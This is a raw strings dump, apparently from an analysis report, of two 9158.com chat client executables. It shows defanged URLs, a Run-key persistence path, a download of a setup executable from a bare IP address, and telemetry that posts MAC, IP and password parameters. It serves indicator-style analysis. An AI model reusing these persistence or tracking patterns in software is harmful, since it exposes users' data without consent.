9158.exe_3012:

.text

`.rdata

@.data

.rsrc

SSh0'

@ SSh`

N SShy

j.hH8S

O SSh

W SSh

H SSh

@ SShU

SSSSSSSh

F SSh

(3-!0,1'8"5.*2$
unzip 0.18 Copyright 1998-2002 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
1.1.4
inflate 1.1.4 Copyright 1995-2002 Mark Adler
HttpQueryInfoA
InternetOpenUrlA
WININET.dll
?IsControlHaveSkin@CAppSysOperation@@UAEHXZ
?CleanBitmapMem@CAppSysOperation@@UAEHXZ
?LoadBitmapFileToMem@CAppSysOperation@@UAEHPAUHINSTANCE__@@VCString@@PAVCBitmap@@@Z
?LoadBitmapFileToMem@CAppSysOperation@@UAEHPAUHINSTANCE__@@VCString@@@Z
?InitializeOperation@CAppSysOperation@@UAEXPAVCWnd@@@Z
?CleanSkin@CAppSysOperation@@UAEHPAX@Z
?DrawContent@CAppSysOperation@@UAEHPAVCDC@@VCString@@AAVCRect@@H@Z
?AdjustPosition@CAppSysOperation@@UAEHHHHH@Z
?AdjustPosition@CAppSysOperation@@UAEHUtagRECT@@@Z
?DrawSkin@CAppSysOperation@@UAEHPAUtagDRAWITEMSTRUCT@@@Z
?PaintBackGround@CAppSysOperation@@UAEHPAVCDC@@@Z
?CleanUp@CAppSysOperation@@UAEXXZ
?AttachBitmapHadle@CAppSysOperation@@UAEXPAUHBITMAP__@@PAVCBitmap@@@Z
?AttachBitmapHadle@CAppSysOperation@@UAEXPAUHBITMAP__@@@Z
?PreTranslateMessage@CUIButtonTemplate@@MAEHPAUtagMSG@@@Z
?messageMap@CUIButtonTemplate@@1UAFX_MSGMAP@@B
?GetCurrentSkin@CAppSysOperation@@UAEHPAX@Z
?LoadSkin@CAppSysOperation@@UAEHPAX@Z
?FitBitmapSize@CAppSysOperation@@UAEXXZ
?messageMap@CUIDlgTemplate@@1UAFX_MSGMAP@@B
?GetBitmapHeight@CAppSysOperation@@QAEHXZ
?GetBitmapWidth@CAppSysOperation@@QAEHXZ
?messageMap@CCustomDlg@@1UAFX_MSGMAP@@B
?LoadSkinToBitmap@CAppSysOperation@@SA_NAAVCBitmap@@PAXAA_N@Z
?SetSkinPath@CAppSysOperation@@SAXVCString@@@Z
?GetPictureExEx@CSkinConfContext@@QAEPAXPBDH@Z
?GetMessageMap@CUIListCtrlEx@@MBEPBUAFX_MSGMAP@@XZ
MVUILib.dll
MSIMG32.dll
MFC42.DLL
MSVCRT.dll
_acmdln
WinExec
GetCPInfo
GetWindowsDirectoryA
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
COMCTL32.dll
ole32.dll
OLEPRO32.DLL
OLEAUT32.dll
WSOCK32.dll
MSVCP60.dll
GdiplusShutdown
gdiplus.dll
publictool.dll
IdleTrac.dll
NETAPI32.dll
SHLWAPI.dll
WINMM.dll
pdh.dll
9158.exe
?GetPassword@CRoomInfo@@QAE?AVCString@@XZ
?GetPort@CRoomInfo@@QAEHXZ
?SetPassword@CRoomInfo@@QAEXPBD@Z
?SetPort@CRoomInfo@@QAEXH@Z
ItemList/Item[ItemName = '%s']/ItemText
ItemList/Item[ItemID = %d]/ItemText
IDispatch error #%d
FSkinRes\HollSplitter.bmp
SkinRes\VIPRoomSkin\row.bmp
%s\%s
%s9158.exe
chatQK.xml
SkinRes\unlock.bmp
dance_room/dance_coffer.aspx
useridx=%s&userpass=%s&type=1
doid=%d&fromid=%d&stepid=%d
%s?url=%s
m_lpNormal->CopyHoleDC(%d, 0, %d, %d)
m_lpActive->CopyHoleDC(0, 0, %d, %d)
%e rcRect(%d,%d,%d,%d)
CBmpProgCtrl..........................................%f*%d = %d
//player.ini
SkinRes\BroadCastBtn.bmp
SkinRes\Broadcastclose.bmp
OnBeforeNavigation: URL="%s", frame="%s", post_data=[0xX,%d bytes], headers="%s"
OnDocumentComplete: URL="%s"
OnProgressChange: progress=%d, progress_max=%d
OnNavigationComplete2: URL="%s"
OnStatusTextChange: text="%s"
OnTitleChange: text="%s"
\SkinRes\fragment.bmp
active.ini
.PAVCInternetException@@
itemboxconfig.xml
faceconfig.xml
itemconfig.xml
\Fruit\fruit.xml
Banner.xml
car.xml
\allplat.xml
%s,%ld,%d,%d,%d,%d,%s
DownLoad.exe
\SkinRes\waring.bmp
hXXp://img8.9158.com/200808/09/00/25/200808091735989s.jpg
%s(%d)
User32.DLL
SkinRes/DriftingHorn.png
%s&userid=%s&type=%d
\tui_AD.ini
\logincount.ini
ToOpenUrl2
GotoWebUrl2
UserLogin
ToOpenUrl
GotoWebUrl
OnWebMessageBox
MsgEnterRoom
AppOpenUrl
LoginErrorRoom
PassAdUser
//weibo.ini
div.img50 img { max-width:60px; max-height:60px;
yqh:expression((this.offsetWidth > this.offsetHeight)?
(this.style.width = this.offsetWidth >= 60 ? "60px" : "auto"):
(this.style.height = this.offsetHeight >= 60 ? "60px" : "auto"));
SkinRes\spinbtn_leftright.bmp
SkinRes\flashTab.bmp
SkinRes\flashTabDown.bmp
%d/%d
SkinRes\MoneyTip.bmp
%Y-%m-%d %H:%M:%S %W-%A
%s\*.*
DynamicEffects\LightSticks.db
DynamicEffects\CaiShenImages.db
DynamicEffects\FireworksImages.db
\DynamicEffects.zip
DynamicEffects\DynamicEffects.zip
\\.\PhysicalDrive%d
\\.\Scsi%d:

XXXXXX

X-

Iphlpapi.dll

cugame.9158.com

active/salebag/getinfo.aspx

SkinRes\btn_giftHorn.bmp

SkinRes/bg_giftHorn.png

CityWide_Step1.sysclose

CareFor(t58)_Step1.dancebtn

CareFor(9158)_Step1.freebtn

CareFor(9158)_Step1.makefriendbtn

CareFor(9158)_Step1.songbtn

CareFor(t58)_Step1.freebtn

CareFor(t58)_Step1.makefriendbtn

Favorite_Step1.select_storebtn

.nevernoticebtn

.receive

LoginReceive_

.iknow

.reg_account

QQLogin_

.songbtn

.dancebtn

.freebtn

.makefriendbtn

.sysclose

.closebtn

.select_unstorebtn

.select_storebtn

Guide_%d

\guidestate.ini

WizardDll.dll

public.dll

hXXp://tj.9158.com/qinqinlog.aspx?%s

Lmarkid=%s&Wmarkid=%s&mac=%s&Qinqinumber=%d&useridx=%s&flagmd5=%s

%s%stest0313

%Y-%m-%d

tui.ini

room_regsum.aspx

useridx=%s&nTime=%d&nType=%s

%d$^&&***WEWEE%s

HallClose.ini

broadHistory.txt

SOFTWARE\9158web\%s

skinres\99Lover.xml

ProxyID.ini

promo/promo_installnum_insert.aspx

ip=%s&nType=%s&mac=%s&promoinfo=%s&content=%s

promo/promo_guestnum_insert.aspx

ip=%s&nType=%s&mac=%s&uidx=%s&time=%d&promoinfo=%s&content=%s

&&**WEWEE%s

%sOnlineUpdate.exe %d

UserInfo.xml

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

ImageOle.dll

login9158.dll

Invoker9158.dll

userinfo.txt

%s

%d%s%s%s

ip=%s&nType=%s&insert=%s&time=%d

EnterRoomURL

9158:{"uidx":%s,"uid":"%s","usex":%s,"viplevel":%d}^|$|^%s

6,%s,%s,0,0

6,%s,%s,%s,%s,%s,%s,%s

LobbyClient.dll

IMClient.dll

DynamicEffects.dll

skinres\skin.ini

//HallClose.ini

skinres\Hall\Signal.bmp

skinres\Hall\currentver.bmp

skinres\Hall\SearchRoomBottomRight.bmp

skinres\Hall\SearchRoomBottomLeft.bmp

skinres\Hall\mainietopright.bmp

skinres\Hall\mainietopLeft.bmp

\SkinRes\HallToolbar.bmp

VideoHelper.dll

SOFTWARE\9158web

AudioPort

Port

%s\%d

%s(%s)

Content-Type: application/x-www-form-urlencoded

url=%s

hXXp://room.9158.com/userroom_get.aspx?roomid=%d&useridx=%s

MainUrl->LeaveRoom_Step1.MainUrl=>Url:hXXp://room.9158.com/ktv_new/ktv_tuiinfo.aspx?roomid=%d&&

idx=%s&u_name=%s&c_name=%s

tiaoshi: %s===>%s

hXXp://room.9158.com/apps/webloginapi.aspx

?type=%d

hXXp://VVV.9158.com

hXXp://room.9158.com

&time=%s&viewpa=1

&time=%s&viewpa=2

%d%d%d%d%d%d

hXXp://cugame.9158.com/active/salebag/getinfo.aspx?id=%s&pwd=%s

LastLoginType

DDVLobby.exe

hXXp://60.191.252.121:8081/DDVGL_Setup.exe

broadcastchat.xml

SkinRes\IM.bmp

face\faceconfig.xml

SOFTWARE\9158web\

allplat.xml

SendVideoSpaceMsg.aspx

my.9158.com

userid=%s&nickname=%s&roomid=%s

Text->CareFor(9158)_Step1.listen=>Content:%d

&&Text->CareFor(9158)_Step1.talk=>Content:%d

&&Text->CareFor(9158)_Step1.sing=>Content:%d

?aid=%d

sound//msg.wav

sound//cash.wav

Text->Task_LevelUp.Text1=>Left:85Top:40Content:

&&Text->Task_LevelUp.Text2=>Left:57Top:65Content: %d

Text->QQLogin_Step1.Account=>Content:%d&&Text->QQLogin_Step1.UserName=>Content:%s&&

GiftHorn.xml

AgentHorn.xml

DriftBroadcast.xml

%d(%s);

Serial:%d

====ItemIndex=%d==&&===ItemNum=%d======

hXXp://room.9158.com/KTV_new/help/help_03.htm#18

.Marquee{ height:16px; overflow:hidden;}

.Marquee div{ width:100%; height:16px; padding-top:0px; padding-bottom: 0px;}

active/clicksave/save.aspx

user=%s&level=%d&savet=%d&clickid=%d

MixerXP.dll FAILED

MixerXP.dll

head//star.xml

Head\era.gif



%s%H:%M:%S
%s\%s.log
hXXp://roommanage.9158.com/active/song_tui/mm_tui.aspx?adstr=%s
hXXp://cugame.9158.com/active/getuserqq/qqinsert.aspx?user=%s&qq=%s&link=%s&stype=ktv
hXXp://room.9158.com/ktv_new/free_mic.aspx?userid=
hXXp://room.9158.com/ktv_new/song_in.aspx?userid=
&r=%d
dance_room_new/click_save.aspx
hXXp://room.9158.com/userroom_add.aspx?roomid=%d&useridx=%s
hXXp://room.9158.com/ktv_new/ktv_tuiroom_in.aspx?parttype=%d
9158.com
tiao58.com
SOFTWARE\t58web
&userid=%s&intype=2&type=%s
&type=%s
//skinres//MoneyRestPass.bmp'> 
 
 >>
 
#sel1#
#p6#/#p3# ' onmousemove="this.className='item item_sel'" onmouseout="this.className='item'">
#p2#
#p1#
hXXp://room.9158.com/ktv_new/myroom_del.aspx?userid=%s&roomid=%s&type=%s
%s-%s|
HistoryRoom.xml
hXXp://room.9158.com/ktv_new/lately_room.aspx?r=
hXXp://room.9158.com/ktv_new/cu_myroom.aspx?userid=
href="javascript:window.external.OnHistory_Showinfo(6,#p9#)" class='next '
href="javascript:window.external.OnHistory_Showinfo(5,#p9#)" class='prev '
')){window.external.OnHistory_Showinfo(4,#pa#);}"
\skinres\fav\sel1.gif' style='border:none;'>
hXXp://room.9158.com/images/newten/go-home.gif
#purl#
hXXp://room.9158.com/ktv_new/head1.jpg
class='hide' href="javascript:window.external.OnHistory_Showinfo(3,#pa#)"
\skinres\fav\sel2.gif' style='border:none;'>
iexplore.exe
hXXp://cugame.9158.com/active/app/load.htm
login=
hXXp://VVV.9158.com/client/login/loginback.aspx?
skinres\RankRate.bmp
skinres\Hall\SearchRoomTopRight.bmp
skinres\Hall\SearchRoomTopLeft.bmp
skinres\Unknown.jpg
skinres\scroll.bmp
\Game\ddvGame.ini
SkinRes//none.bmp
SkinRes\TreeStatus.bmp
SkinRes\Hall\searchRoombtn.bmp
SkinRes\Hall\headbutton.bmp
SkinRes\Hall\MiniInfor.bmp
SkinRes\Hall\bag.bmp
SkinRes\systemCenter.bmp
SkinRes\set.bmp
SkinRes\mybank.bmp
SkinRes\vip.bmp
SkinRes\systemSet.bmp
SkinRes\systemReg.bmp
\SkinRes\IMToolBar.bmp
Head\era.bmp
Head\crown.bmp
Head\topestpurple2.bmp
Head\topestpurple.bmp
Head\DiamondPurple2.bmp
Head\DiamondPurple.bmp
Head\queenPurple2.bmp
Head\queenPurple.bmp
Head\Purple2.bmp
Head\Purple.bmp
Head\purplevip2.bmp
Head\purplevip.bmp
Head\level15.bmp
Head\redvip.bmp
Head\0_bluevip.bmp
Head\paliesman.bmp
onclick="window.external.OnclickHead('1')">
hXXp://
Head\user_photo.bmp
hXXp://vip.9158.com/
Head\H5_2.bmp
Head\H5_1.bmp
Head\H4_2.bmp
Head\H4_1.bmp
Head\H3_2.bmp
Head\H3_1.bmp
Head\H2_2.bmp
Head\H2_1.bmp
Head\H1_2.bmp
Head\H1_1.bmp
Head\H0_2.bmp
Head\H0_1.bmp
-L"prdname=9158 idx=%s id=%s nick=%s pwd=%s rinfo=0"
%Y%m%d
%s\%d\%s
SkinRes\BtnMinInfor.bmp
SkinRes\BtnCloseInfor.bmp
%s&uidx=%s
SkinRes\brInfor.bmp
SkinRes\blInfor.bmp
SkinRes\trInfor.bmp
SkinRes\tlInfor.bmp
%s %s
%d||%d||%d||%s
.img50 { width:50px; height:50px; text-align:center; }
div.img50 img { max-width:50px; max-height:50px;
yqh:expression((this.offsetWidth > this.offsetHeight)?(this.style.width = this.offsetWidth >= 50 ? "50px" : "auto"):(this.style.height = this.offsetHeight >= 50 ? "50px" : "auto"));
%s x%d
skinres\message.bmp
updateitem.dll
hXXp://roommanage.9158.com/room_regin/reg.aspx?introducer=%s&ntype=1&station=%s
%s;%s
LoginDlg
LoginDlg2
//banner//logbg.bmp
SkinRes\admess.bmp
\SkinRes\admess.bmp" width="
' target='_blank' onFocus='this.blur()'>
\guestlogin.ini
SkinRes\TG\mins1.bmp
//banner//log_min.bmp
SkinRes\TG\closes1.bmp
//banner//log_close.bmp
Hall_LoginMenu
Login_Guest
Hall_LoginCancel
Hall_LoginOK
HallLoginReg
Login_Weibo
Login_Alipay
Login_QR
Login_QQ
Login_idx
Login_User
GuestLogin_Tui
GetLoginNodeData.aspx
dl.week8.net
platname=%s&userid=%s&loginip=%s&loginport=%d
/Error.txt
CLoginDlg m_nLoginType!=nType
hXXp://roommanage.9158.com/active/roomsearch/iproom_in.aspx
SysMsgCloseBtn
skinres\login.gif
hXXp://VVV.9158.com/?code=
SkinRes/IeClose.png
%H : %M      %Y/%m/%d
nIDKey
MsgCloseBtn
SockClient.dll
Multi*.dll
.PAVCObject@@
.PAVCException@@
.PAVCFileException@@
%sBugReport.exe ,%s
Flags:X
DS:X ES:X FS:X GS:X
SS:ESP:X:X EBP:X
CS:EIP:X:X
EAX:X
EBX:X
ECX:X
EDX:X
ESI:X
EDI:X
Fault address1: X X:X %s
Exception code1: X %s
//build4.5%d-%d-%d %d:%d:%d***************************************************
NTDLL.DLL
FLT_INVALID_OPERATION
FLT_DENORMAL_OPERAND
 
 >>

X X X:X %s

SkinRes\buttonmi.bmp

SkinRes\roomclose.bmp

SkinRes\rightBackground.bmp

SkinRes\leftBackground.bmp

SkinRes\BackgroundRB.bmp

SkinRes\BackgroundLB.bmp

SkinRes\BackgroundRT.bmp

SkinRes\BackgroundLT.bmp

in_coffer_new.aspx

useridx=%s&userpass=%s&type=4&oldbankpass=%s&newbankpass=%s

%s?user=%s&userid=%s

%s&r=%d

CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\

CLSID\%s\InprocServer32

SkinRes\shield.bmp

\sndvol.exe

\sndvol32.exe

hXXp://room.9158.com/in_user_roomin.aspx?roomid=100000

VolumeDB:%d, Pole:%d

//91KboxVCamSetup.exe

//9158VCamSetup.exe

//91KboxVCamSetup.exe

91KboxVCamSetup.exe

//9158VCamSetup.exe

9158VCamSetup.exe

C:\2.txt

%s//in_userchange.aspx?%s

in_userchange.aspx

useridx=%s&type=1

in_userchange_new.aspx

type=2&useridx=%s&name=%s&sex=%s&birthday=%s&province=%s&city=%s

type=2&useridx=%s&oldpass=%s&newpass=%s

PersonalSetting_MSG

%sMultiChatGuest.dll

Host not found: %s

%s - WSAError: %ld

ip=%s&nType=%s&insert=%s&idx=%s&ID=%s&promoid=%s&sType=%s&Version=2

EnterTURL

skinres\WaitRoom.gif

\SkinRes\ServerInfo.bmp

useridx=%s&userpass=%s&type=3&bankcash=%d&sepwd=%s

worldbrocast.xml

RankMsgOkBtn

active/affiche/affiche_ktv.aspx

roomgame/get_gameinfo.aspx

hXXp://cugame.9158.com/active/roomapply/apply.aspx

useridx=%s&userpass=%s&type=2&bankcash=%d

SkinRes\Hall\search_text_bg.bmp

SkinRes\Hall\return.bmp

active/roomsearch/im_search_k.aspx

searchstr=%s&useridx=%s

%s%s%s

!%d/%d

.photo { position:relative; width:540px; height:650px; margin:0px auto; }

.photo .img, .photo .prev, .photo .next, .photo .down, .photo .share_t,

.photo .share_qzone, .photo .share_weibo { position:absolute; z-index:1; }

.photo .img { left:30px; top:0px; width:480px; height:640px; overflow:hidden; }

.photo .img .img_in { display:table; width:480px; height:640px; }

.photo .img p { display:table-cell; vertical-align:middle; text-align:center; *display:block; *font-size:558px; *font-family:Arial; }

.photo .img img { vertical-align:middle; max-height:640px; max-width:480px; }

* html .photo .img img {

_width: expression(this.offsetWidth > 480 ? '480px': true); }

.photo .prev, .photo .prev:hover,

.photo .next, .photo .next:hover { z-index:3; top:264px; display:block; width:82px; height:82px; cursor:pointer; cursor:hand; }

.photo .prev { left:10px; }

.photo .prev:hover { }

.photo .next { right:10px; _left:445px; }

.photo .next:hover { }

.photo .down,

.photo .down:hover,

.photo .share_t,

.photo .share_t:hover,

.photo .share_qzone,

.photo .share_qzone:hover,

.photo .share_weibo,

.photo .share_weibo:hover { top:560px; z-index:3; display:block; width:64px; height:60px; cursor:pointer; cursor:hand; }

.photo .down { left:350px; }

.photo .down:hover { }

.photo .share_t { left:120px; }

.photo .share_t:hover { }

.photo .share_qzone { left:180px; }

.photo .share_qzone:hover { }

.photo .share_weibo { left:240px; }

.photo .share_weibo:hover { }

function UrlEncode(s) { var hex=''; var i,j,t; j=0; for (i=0; i 65535) { return ('err!') } first = Math.round(num/4096 - .5); temp1 = num - first * 4096; second = Math.round(temp1/256 -.5); temp2 = temp1 - second * 256; third = Math.round(temp2/16 - .5); fourth = temp2 - third * 16; return (getletter(third) getletter(fourth)); } function getletter(num) { if (num document.getElementById('showimg').src = Astr[nowpos];
function downit(){ window.external.downloadpic(Astr[nowpos]);} function linkit(t){ if(t==1) { window.open('hXXp://share.v.t.qq.com/index.php?c=share&a=index&title=
&url=hXXp://VVV.9158.com&appkey=ce15e084124446b9a612a5c29f82f080&site=VVV.9158.com&pic=' Astr2[nowpos]); } if(t==2) { window.open('hXXp://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?url=' Astr2[nowpos] '&title=
&summary=&pics=' Astr2[nowpos]); } if(t==3) { window.open('hXXp://service.weibo.com/share/share.php?title=
&url=hXXp://VVV.9158.com&source=bookmark&appkey=2992571369&ralateUid=&pic=' Astr2[nowpos]); } }
var arVersion = navigator.appVersion.split('MSIE');
if ((version >= 5.5) && (version var imgID = (myImage.id) ? "id='"   myImage.id   "' " : "";
var imgClass = (myImage.className) ? "class='"   myImage.className   "' " : "";
var imgTitle = (myImage.title) ? "title='"   myImage.title   "' " : "title='"   myImage.alt   "'";
var imgStyle = "display:inline-block;"   myImage.style.cssText;
var strNewHTML = "";
myImage.outerHTML = strNewHTML;
window.onload=function(){
nowpos=%d;imgchange(1);
Astr[m_total]='%s'; Astr2[m_total]='%s'; m_total  ;
SkinRes/GiftBox.bmp
SkinRes\getmoney.bmp
SkinRes\buttonclose.bmp
Button%d
%s List of controls follows:
%s Number of controls: %lu
%s Number of channels: %lu
%s Number of source lines associated with destination line: %lu
%s Manufacturer and product IDs: %u -- %u (see mmreg.h or help subject: "Manufacturer and Product Identifiers")
%s Target name: %s
%s Target type: %lu --
%s Audio line is active. signal is probably passing through the line.
%s Audio line is disconnected.
%s Audio line is an audio source line associated with a single audio destination line.
%s Short Name: %s
%s Name: %s
%s Audio line is a source originating from the waveform-audio output digital-to-analog converter (DAC).
%s MIXERLINE_COMPONENTTYPE_SRC_WAVEOUT
%s Audio line is a source originating from an incoming telephone line.
%s MIXERLINE_COMPONENTTYPE_SRC_TELEPHONE
%s Audio line is a source originating from the output of an internal synthesizer.
%s MIXERLINE_COMPONENTTYPE_SRC_SYNTHESIZER
%s Audio line is a source originating from personal computer speaker.
%s MIXERLINE_COMPONENTTYPE_SRC_PCSPEAKER
%s Audio line is a microphone recording source.
%s MIXERLINE_COMPONENTTYPE_SRC_MICROPHONE
%s Audio line is a line-level source (for example, line-level input from an external stereo).
%s MIXERLINE_COMPONENTTYPE_SRC_LINE
%s Audio line is a digital source (for example, digital output from a DAT or audio CD).
%s MIXERLINE_COMPONENTTYPE_SRC_DIGITAL
%s Audio line is a source originating from the output of an internal audio CD.
%s MIXERLINE_COMPONENTTYPE_SRC_COMPACTDISC
%s Audio line is a source originating from the auxiliary audio line.
%s MIXERLINE_COMPONENTTYPE_SRC_AUXILIARY
%s Audio line is an analog source (for example, analog output from a video-cassette tape).
%s MIXERLINE_COMPONENTTYPE_SRC_ANALOG
%s Audio line is a source that cannot be defined by one of the standard component types.
%s MIXERLINE_COMPONENTTYPE_SRC_UNDEFINED
%s Audio line is a destination that will be the final recording source for voice input.
%s MIXERLINE_COMPONENTTYPE_DST_VOICEIN
%s Audio line is a destination that will be the final recording source for the waveform-audio input (ADC).
%s MIXERLINE_COMPONENTTYPE_DST_WAVEIN
%s Audio line is a destination that will be routed to a telephone line.
%s MIXERLINE_COMPONENTTYPE_DST_TELEPHONE
%s Audio line is an adjustable (gain and/or attenuation) destination intended to drive headphones.
%s MIXERLINE_COMPONENTTYPE_DST_HEADPHONES
%s Audio line is an adjustable (gain and/or attenuation) destination intended to drive speakers.
%s MIXERLINE_COMPONENTTYPE_DST_SPEAKERS
%s Audio line is a destination used for a monitor.
%s MIXERLINE_COMPONENTTYPE_DST_MONITOR
%s Audio line is a line level destination that will be the final recording source for the analog-to-digital converter (ADC).
%s MIXERLINE_COMPONENTTYPE_DST_LINE
%s Audio line is a destination that cannot be defined by one of the standard component types.
%s MIXERLINE_COMPONENTTYPE_DST_UNDEFINED
%s Audio line is a digital destination (for example, digital input to a DAT or CD audio device).
%s MIXERLINE_COMPONENTTYPE_DST_DIGITAL
%s Line type :
%s -----------------------------------------------------------------------
%s Name: %d
%s -------------- Item %d -------------
%s Number of items per channel: %d
%s - Multiple control. The control has two or more possible settings.
%s - Control is disabled
%s - Uniform control
%s Status and support flags:
%s - Steps: %lu
%s - Max: %lu
%s - Min: %lu
%s - Max: %ld
%s - Min: %ld
%s Custom control
%s Name: %s
%s Short Name: %s
%s -----------------------------------------------------------------
%s Control type:
%s ---------------------------- Control ----------------------------
== Source line. Index = %d ===========================================================
** Destination line. Index = %d *******************************************************************
You will pass these to the Init() functions of the various CMixerBase-derived classes
Number of destination lines: %d
Name of device: %s
..............nVolume:%d
dBFS..............%d,%d
%Y/%m/%d/%H:%M:%S
------UrlAnalyzeEdit---Error---
%s
\9158.exe
%d/%d(
SkinRes\X.bmp
useridx=%s&userpass=%s&type=5&sepwd=%s
';break;}document.getElementById('passqd').innerHTML =sinfo;}document.oncontextmenu=new Function('event.returnValue=false;');SkinRes\X2.bmp
hXXp://roommanage.9158.com/active/usersearch_k/get_bindinfo.aspx?idx=
:   %s 
: %s
: : %s : %s ';break;}document.getElementById('passqd').innerHTML =sinfo;}document.oncontextmenu=new Function('event.returnValue=false;');
SkinRes/userlogininfo.png
lastlogin:
%sid=%s&idx=%s
SkinRes\HeadInfo\set.bmp
SkinRes\HeadInfo\bind.bmp
SkinRes\HeadInfo\close.bmp
UserInfoDlg_password2SkinRes\ie_bg.png
SkinRes\Notifybutton.bmp'
%s&userid=%s&type=%s
{47B2178B-6E4A-49B4-9860-9B1836990CA9}
{6C9A41B3-ABB2-45F7-B591-93456A6FCD20}
{0CFC0B7A-7907-49FD-B181-1B8B3955DB74} 
%s
//skinres//vipendtime1.png
 
//skinres//vipendtime2.png
skinres\WarehouseBG.bmp
CWebBrowser2
/**%nick/**
hXXp://room.9158.com/dance_room_new/logpay/silver_help.aspx
SkinRes/BackgroundRB.bmp
SkinRes/BackgroundLB.bmp
SkinRes/BackgroundRT.bmp
SkinRes/BackgroundLT.bmp
KX......GetInputDeviceName...return false
KX......GetInputDeviceName...%s
KX......GetInputDeviceName...2
KX......GetInputDeviceName...1
sound\Blip.wav
KX......GetOutputDeviceName...return false
KX......GetOutputDeviceName...%s
KX......InitSubDlg...m_dlgYsq
KX......InitSubDlg...m_dlgMkf
00000000000000000001
d:\Program Files\9158KTV\9158.RPT
#':!%(.FHL
___???***666
(Y%C|B^
*X.Gv*`.Gz
.X7Kw.Dx*(W.CuC^
*&)@??%$*
'L":a.Ds 8f.?l0:^
D%3[.Dp
1&-T.Bg
,Y.Cr,@n*?h6N{[o
version="1.0.0.0"
name="9158.exe.manifest"
!"#$%&'()* ,
{8856F961-340A-11D0-A96B-00C04FD705A2}
2014-4-4 10
(192.168.1.44)
6, 9, 4, 0
Login
Windows
9158IE.exe_3116:.text
`.rdata
@.data
.rsrc
j SSSSSSSh
MFC42.DLL
MSVCRT.dll
_acmdln
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
OLEAUT32.dll
MSVCP60.dll
WINMM.dll
?SetJpegQuality@CxImage@@QAEXE@Z
publictool.dll
9158IE.exe
public.dll
NetworkOpt.dll
DEBUG:%s,%d
%d|%d|%d|%d|%d|%d|%d|%d|%d|%d|
MixerXP.dll FAILED
MixerXP.dll
zzzzzzzzzzzzz333 %d %d %d
zzzzzzzzzzzzz111 %d %d %d
zzzzzzzzzzzzz222 %d %d %d
SOFTWARE\9158web
AVUI.dll
qqqqqqqq2:%d %d %d %d
%s|%d
{ if(bScrollState!=0) { window.external.ScrollBtnSet(nType,1); } bScrollState=0; } else
{ if(bScrollState!=1) { window.external.ScrollBtnSet(nType,0); } bScrollState=1; } };
if(document.body){
bodyScrollTop = document.body.scrollTop;
if(document.documentElement){
documentScrollTop = document.documentElement.scrollTop;
bodyScrollHeight = document.body.scrollHeight;
documentScrollHeight = document.documentElement.scrollHeight;
if(document.compatMode == 'CSS1Compat'){
windowHeight = document.documentElement.clientHeight;
windowHeight = document.body.clientHeight;
 
"; document.getElementById("fixit").innerHTML=str document.getElementById("fixit").innerHTML; nownum  ; } 
')>0) {return;}else{document.getElementById(id).innerHTML="  
";window.external.DoForwardNotice(str);}}
if (window.top.moveBy) {
window.top.moveBy(0,i);
window.top.moveBy(i,0);
window.top.moveBy(0,-i);
window.top.moveBy(-i,0);
}function On_change(msg,obj) { obj.innerHTML="" msg ""} function show_result(sUserID){window.external.OnFlashInfo(sUserID,'admin')} function thisMovie(movieName) { if(navigator.appName.indexOf("Microsoft") != -1 ) return window[movieName]; else return document[movieName]; } function play_movie(idFlash,thing,sDiceNum,isadmin,sUserID,sMsg,sBeging) { var Movie = thisMovie(idFlash); Movie.dowhat(thing,sDiceNum,isadmin,sUserID,sMsg,sBeging);} 
%s9158IE.exe
JoinOpenTreasuryBox
ToOpenUrl2
GotoWebUrl2
UserLogin
ToOpenUrl
GotoWebUrl
OnWebMessageBox
MsgEnterRoom
AppOpenUrl
LoginErrorRoom
PassAdUser
//weibo.ini
filenew.9158.com
room/imgout1.aspx
.PAVCException@@
%u / %u
Content-Type: multipart/form-data; boundary=%s
Content-Disposition: form-data; name="trackdata"; filename="%s"
--%s--
%s%d%d%s%s%s%d
szData=%s
%s%d%d%d%s%s%s%d
%s%d%d%d%s%s%s%d%s
%s|%.2f|%d|%.2f
Content-Type: application/x-www-form-urlencoded
.PAVCInternetException@@
VideoHelper.dll
9158VCComm.dll
5.0.0.3
CWebBrowser2
version="1.0.0.0"
name="9158.exe.manifest"
{8856F961-340A-11D0-A96B-00C04FD705A2}
1, 0, 0, 1
9158IE.EXE
3t3>
3t3>